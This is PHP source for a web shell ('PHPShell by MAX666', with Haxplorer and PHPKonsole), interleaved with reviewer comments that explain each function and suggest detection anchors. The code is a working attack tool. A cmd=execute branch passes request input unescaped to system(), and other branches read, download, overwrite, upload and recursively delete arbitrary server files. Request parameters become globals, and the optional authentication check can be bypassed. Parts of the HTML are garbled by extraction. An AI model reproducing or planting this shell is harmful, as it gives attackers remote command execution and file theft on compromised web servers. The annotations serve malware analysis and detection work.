=4);
/*
 * NOTE(review): the statement ending in "=4);" above starts before this excerpt; it is reproduced as found.
 *
 * What follows is the bootstrap of a PHP web shell: a file manager plus a command runner, per the
 * $cmd dispatcher later in the file. The string literals in this section (the title, the
 * "by MAX666" ident, $scriptdate and $scriptver) are fixed text, which makes them practical
 * anchors for content-based detection of this sample.
 */
$scriptTitle = "PHPShell";
$scriptident = "$scriptTitle by MAX666";
$urlAdd = "";
$formAdd = "";

/*
 * walkArray: for every scalar entry of $array, creates or overwrites the global variable named by
 * the entry's key (variable variable "$$key") and appends "key=urlencode(value)&" to the global
 * $urlAdd; nested arrays are walked recursively.
 * Applied to the request arrays below, this re-creates register_globals behaviour: $cmd, $dir,
 * $file and every other name used later in the script can be set by whoever sends the request.
 * It relies on each(), which was removed in PHP 8.0, so the code runs unmodified only on older
 * runtimes.
 */
function walkArray($array){
    while (list($key, $data) = each($array))
        if (is_array($data)) { walkArray($data); }
        else {
            global $$key; $$key = $data;
            global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}

/*
 * PHP has no $_PUT superglobal; unless a part of the file not visible here defines it, only the
 * $_GET and $_POST calls take effect. $_POST is walked last, so a POST value overwrites a GET
 * value of the same name.
 */
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);

/* Cut $urlAdd at the first "s=r" (strval(false) is "", so the test means "found"), then append a fresh "&s=r&" marker. */
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") { $urlAdd= substr($urlAdd, 0, $pos); }
$urlAdd .= "&s=r&";

if (empty($Pmax)) $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx)) $Pidx = 0;

/*
 * Separator normalisation only: doubled backslashes become single, "//" becomes "/", then every
 * backslash becomes "/". Nothing confines the result to a base directory; ".." segments and
 * absolute paths are left exactly as supplied in the request.
 */
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));

$scriptdate = "For Server Hacking";
$scriptver = "Private Exploit";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array( "Edit" => "edit.gif", "Download" => "download.gif", "Upload" => "upload.gif", "Delete" => "delete.gif", "View" => "view.gif", "Rename" => "rename.gif", "Move" => "move.gif", "Copy" => "copy.gif", "Execute" => "exec.gif" );

/*
 * Replace each image file name with a text label: the quoted action name when the image exists
 * under $LOCAL_IMAGE_DIR, otherwise the action name in brackets.
 * NOTE(review): the first form was presumably an image tag whose markup was lost in extraction.
 */
while (list($id, $im)=each($img))
    if (file_exists("$LOCAL_IMAGE_DIR/$im")) $img[$id] = "\"$id\"";
    else $img[$id] = "[$id]";

/* HTTP AUTHENTICATION */
/*
 * Optional HTTP Basic gate. && binds tighter than ||, so the 401 is sent when
 *   (a) $http_auth_user and $http_auth_pass are both set and the presented
 *       $PHP_AUTH_USER / $PHP_AUTH_PW do not match them, or
 *   (b) $logoff == 1 and $noauth == "yes".
 * No assignment to $http_auth_user or $http_auth_pass is visible in this excerpt; if none exists
 * elsewhere, (a) never fires and the script answers any requester. These names are ordinary
 * globals, so walkArray() above can also populate them from request parameters: the check does
 * not rest on server-held values. The comparison uses loose != on the plain strings.
 */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
    setcookie("noauth","");
    Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
    Header( "HTTP/1.0 401 Unauthorized");
    echo "Your username or password is incorrect";
    exit ;
}

/*
 * buildUrl: builds "<script>?<carried parameters><url>" into $url and returns the link text.
 * $SFileName is not declared global here, so inside the function it is an undefined local and
 * contributes an empty string; as shown, the computed $url is not part of the return value.
 * NOTE(review): the return string was presumably an anchor tag around $display whose markup was
 * lost in extraction. Callers pass raw "$dir/$file" text in $url; nothing here encodes it.
 */
function buildUrl($display, $url) {
    global $urlAdd;
    $url = $SFileName . "?$urlAdd$url";
    return "$display";
}

/*
 * sp: returns $mp copies of a one-character string. $ret is never initialised, so the result is
 * null when $mp <= 0.
 * NOTE(review): the character was presumably a non-breaking-space entity before extraction.
 */
function sp($mp) {
    for ( $i = 0; $i < $mp; $i++ ) $ret .= " ";
    return $ret;
}

/*
 * spacetonbsp: as shown, search and replacement look identical.
 * NOTE(review): presumably the replacement was an entity before extraction; confirm against an intact copy.
 */
function spacetonbsp($instr) {
    return str_replace(" ", " ", $instr);
}

/*
 * Mydeldir: recursive delete. For a directory, every entry except "." and ".." is passed back
 * into Mydeldir() first, then the directory itself goes to rmdir(); anything that is not a
 * directory goes to unlink(). The return value is the rmdir()/unlink() result of the top-level
 * call only; results for children are discarded and opendir()/closedir() errors are suppressed
 * with @.
 */
function Mydeldir($Fdir) {
    if (is_dir($Fdir)) {
        $Fh=@opendir($Fdir);
        while ($Fbuf = readdir($Fh))
            if (($Fbuf != ".") && ($Fbuf != "..")) Mydeldir("$Fdir/$Fbuf");
        @closedir($Fh);
        return rmdir($Fdir);
    } else {
        return unlink($Fdir);
    }
}

/* arrval: returns element 1 of a two-element list (the value half of an each() result); element 0 is unpacked and discarded. */
function arrval ($array) {
    list($key, $data) = $array;
    return $data;
}

/*
 * formatsize: formats a byte count with a unit suffix. Up to four times, while the running value
 * is greater than 1024, it is divided by 1024 -- written as intval(intval($size) / 1.024) / 1000,
 * which keeps three decimals -- and the unit moves B -> KB -> MB -> GB -> TB. intval($size)
 * drops any fraction left over from the previous step before dividing again.
 * Returns "<number> <unit>".
 */
function formatsize($insize) {
    $size = $insize;
    $add = "B";
    if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "KB"; }
    if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "MB"; }
    if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "GB"; }
    if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "TB"; }
    return "$size $add";
}

/*
 * The HTML page header is emitted for every command except "downl"; that branch sends its own
 * HTTP headers later in the file. This if-block stays open past the end of this excerpt.
 */
if ($cmd != "downl") { ?> <?php echo $SFileName ?>
- -

".sp(3)."\n\n\n\n COULD NOT OPEN THIS DIRECTORY!!!
".sp(3)."\n THE SCRIPT WILL RESULT IN AN ERROR!!!

".sp(3)."\n PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...

\n\n\n\n"; } if (function_exists('realpath')) { $partdir = realpath($dir); } else { $partdir = $dir; } if (strlen($partdir) >= 100) { $partdir = substr($partdir, -100); $pos = strpos($partdir, "/"); if (strval($pos) != "") { $partdir = "<-- ...".substr($partdir, $pos); } $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); } ?>
" method="POST">
 HAXPLORER - Server Files Browser... 

 Browsing: 
 GO 
$Pmax ) { $from = $Pidx * $Pmax; $to = ($Pidx + 1) * $Pmax-1; if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) $to = count($filelist) - 1; if ($to > count($filelist)-1) $to = count($filelist)-1; $Dcontents = array(); For ($Fi = $from; $Fi <= $to; $Fi++) { $Dcontents[] = $filelist[$Fi]; } } else { $Dcontents = $filelist; } $tdcolors = array("lighttd", "darktd"); while (list ($key, $file) = each ($Dcontents)) { if (!$tdcolor=arrval(each($tdcolors))) { reset($tdcolors); $tdcolor = arrval(each($tdcolors)); } if (is_dir("$dir/$file")) { /* */ /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } else { /* */ /* */ if ( @is_readable("$dir/$file") ) echo "\n"; else echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } } echo "
 Filename   Actions (Attempt to perform)   Size   Attributes   Modification Date 
".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
".sp(2)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo "  
   \n"; echo "D"; if ( @is_readable("$dir/$file") ) { echo "R"; } if (function_exists('is_writeable')) { if ( @is_writeable("$dir/$file") ) { echo "W"; } } else { echo "(W)"; } if ( @is_executable("$dir/$file") ) { echo "X"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
".sp(3).$file.sp(9)."
  \n"; /* */ echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; /* */ echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; /* */ echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; /* */ if ( @is_executable("$dir/$file") ) echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; /* */ echo sp(2)."
\n"; $size = @filesize("$dir/$file"); If ($size != false) { $filesizes += $size; echo "  ".formatsize($size).""; } else echo "  0 B"; echo "    \n"; if ( @is_readable("$dir/$file") ) echo "R"; if ( @is_writeable("$dir/$file") ) echo "W"; if ( @is_executable("$dir/$file") ) echo "X"; if (function_exists('is_uploaded_file')){ if ( @is_uploaded_file("$dir/$file") ) echo "U"; } else { echo "(U)"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
\n\n"; function printpagelink($a, $b, $link = ""){ if ($link != "") echo "| $a - $b |"; else echo "| $a - $b |"; } if ( count($filelist)-1 > $Pmax ) { echo ""; } echo "
\n"; echo "  ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s)  \n"; echo "\n"; echo "  Total filesize: ".formatsize($filesizes)."  
Page:
"; $Fi = 0; while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = ($Fi + 1) * $Pmax - 1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "   "; $Fi++; } $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = count($filelist)-1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "
\n
"; if ($isGoodver) { echo "\n"; } else { echo "\n"; } /* */ echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo ""; echo "
 Server's PHP Version:    $PHPVer 
 Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
 Other actions:    ".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
 Script Location:    $PATH_TRANSLATED
 Your IP:    $REMOTE_ADDR 
 Browsing Directory:   $partdir 
 Legend:  \n"; echo ""; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "
D:  Directory.
R:  Readable.
W:  Writeable.
X:  Executable.
U:  HTTP Uploaded File.
"; echo "
"; @closedir($h); } elseif ( $cmd=="execute" ) {
/*
 * Command-execution branch. $file is whatever the request supplied as "file" (imported as a
 * global by walkArray() at the top of the script; the directory listing builds links of the form
 * cmd=execute&file=...). It is passed to system() with no validation or escaping, so any request
 * that reaches this script runs an OS command with the web server's privileges.
 * system() writes the command output itself and returns its last line, which the echo then
 * prints a second time.
 * Detection: shell or other child processes spawned by the web-server/PHP user, and requests
 * carrying cmd=execute, are the observable traces of this branch.
 */
echo system("$file"); } elseif ( $cmd=="deldir" ) { /* */ echo "
"; } elseif ( $cmd=="delfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (Mydeldir($file)==false) { echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; } else { echo "Successfully removed \"$file\"
"; } echo ""; } else { echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
"; } echo "
"; } elseif ( $cmd=="newfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (@unlink($file)==false) { echo "Could not remove \"$file\"
"; } else { echo "Successfully removed \"$file\"
"; } echo "
"; } else { echo "Are you sure you want to delete \"$file\" ?
"; } echo "
"; $i = 1; while (file_exists("$lastdir/newfile$i.txt")) $i++; $file = fopen("$lastdir/newfile$i.txt", "w+"); if ($file == false) echo "Could not create the new file...
"; else echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; echo "
"; } elseif ( $cmd=="newdir" ) { /* */ echo "
" ; $i = 1; while (is_dir("$lastdir/newdir$i")) $i++; $file = mkdir("$lastdir/newdir$i", 0777); if ($file == false) echo "Could not create the new directory...
"; else echo "Successfully created: \"$lastdir/newdir$i\"
"; echo "
"; } elseif ( $cmd=="edit" ) { /* */ $contents = ""; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { $contents .= htmlentities( $line ) ; } echo "
"; echo "M
\n"; echo "\n"; echo "EDIT FILE: $file
\n"; echo "
\n"; echo "\n"; echo ""; echo "
"; echo "
"; } elseif ( $cmd=="saveedit" ) {
    /*
     * Save branch of the editor: opens the request-supplied path $file for writing (truncating
     * it) and writes the request-supplied $contents after stripslashes(). There is no path
     * restriction and no return-value check: if fopen() fails, fwrite() and fclose() are still
     * called on false. $wrret and $clret are not read in the code visible here.
     * This is the shell's write primitive; unexpected writes by the web-server user, especially
     * to script files under the document root, are what file-integrity monitoring would surface.
     */
    $fo = fopen($file, "w"); $wrret = fwrite($fo, stripslashes($contents)); $clret = fclose($fo);
} elseif ( $cmd=="downl" ) {
    /*
     * Download branch: streams any file the web-server user can read. $file is passed through
     * urldecode() once more here; basename() supplies the suggested file name (falling back to
     * "download.ext" when the function is unavailable); when filesize() returns a non-zero
     * value, "; size=N" is appended to the Content-Disposition header. The file name is placed
     * in that header unquoted. fopen() is not checked and $fp is never closed.
     */
    $downloadfile = urldecode($file);
    if (function_exists("basename")) $downloadto = basename ($downloadfile); else $downloadto = "download.ext";
    if (!file_exists("$downloadfile")) echo "The file does not exist";
    else {
        $size = @filesize("$downloadfile");
        if ($size != false) { $add="; size=$size"; } else { $add=""; }
        header("Content-Type: application/download");
        header("Content-Disposition: attachment; filename=$downloadto$add");
        $fp=fopen("$downloadfile" ,"rb"); fpassthru($fp); flush();
    }
} elseif ( $cmd=="upload" ) { /* */ ?>
Welcome to the upload section... Please note that the destination file will be
overwritten if it already exists!!!

" method="post"> Select local file:


" method="POST">
*/ echo "
"; if (file_exists($userfile)) $res = copy($userfile, "$dir/$userfile_name"); echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; if ($res) { echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n

"; echo "Local filename: \"$userfile_name\".\n
Remote filename: \"$userfile\".\n
"; echo "Filesize: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; } else { echo "Could not move uploaded file; Action aborted..."; } echo "
" ; echo "

"; } elseif ( $cmd=="file" ) { /* */ echo "
"; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { echo spacetonbsp(@htmlentities($line))."
\n"; } echo "
"; } elseif ( $cmd=="ren" ) { /* */ if (function_exists('is_dir')) { if (is_dir("$oldfile")) { $objname = "Directory"; $objident = "Directory"; } else { $objname = "Filename"; $objident = "file"; } } echo "
 Rename a file: 

\n"; If (empty($newfile) != true) { echo "
"; $return = @rename($oldfile, "$olddir$newfile"); if ($return) { echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; } else { if ( @file_exists("$olddir$newfile") ) { echo "Error: The $objident does already exist...

\"$olddir$newfile\"

Hit your browser's back to try again..."; } else { echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; } } echo "
" ; } else { $dpos = strrpos($oldfile, "/"); if (strval($dpos)!="") { $olddir = substr($oldfile, 0, $dpos+1); } else { $olddir = "$lastdir/"; } $fpos = strrpos($oldfile, "/"); if (strval($fpos)!="") { $inputfile = substr($oldfile, $fpos+1); } else { $inputfile = ""; } echo "
\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "Rename \"$oldfile\" to:
\n"; echo "
"; echo "
"; echo "
"; } } else if ( $cmd == "con") { ?>

PHPKonsole

" method="post">
Current working directory: Root/', $PHP_SELF, $stderr); if (!empty($work_dir_splitted[0])) { $path = ''; for ($i = 0; $i < count($work_dir_splitted); $i++) { $path .= '/' . $work_dir_splitted[$i]; printf('%s/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); } } ?> Choose new working directory:

Command:

Enable stderr-trapping? >

*/ $isMainMenu = true; ?>
 .:: Main Menu ::. 

==> Haxplorer <==", "cmd=dir&dir=.").sp(2); ?> Haxplorer is a server side file browser wich (ab)uses the directory object to list the files and directories stored on a webserver. This handy tools allows you to manage files and directories on a unsecure server with php support.

This entire script is coded for unsecure servers, if your server is secured the script will hide commands or will even return errors to your browser...

==> PHPKonsole <==", "cmd=con").sp(2); ?>
PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...

This function will only work if the server supports php and the execute commands...


  [ Main Menu ] ", "cmd=&dir="); ?>     [ PHPKonsole ] ", "cmd=con"); ?>     [ Haxplorer ] ", "cmd=dir&dir=."); ?>   

  - -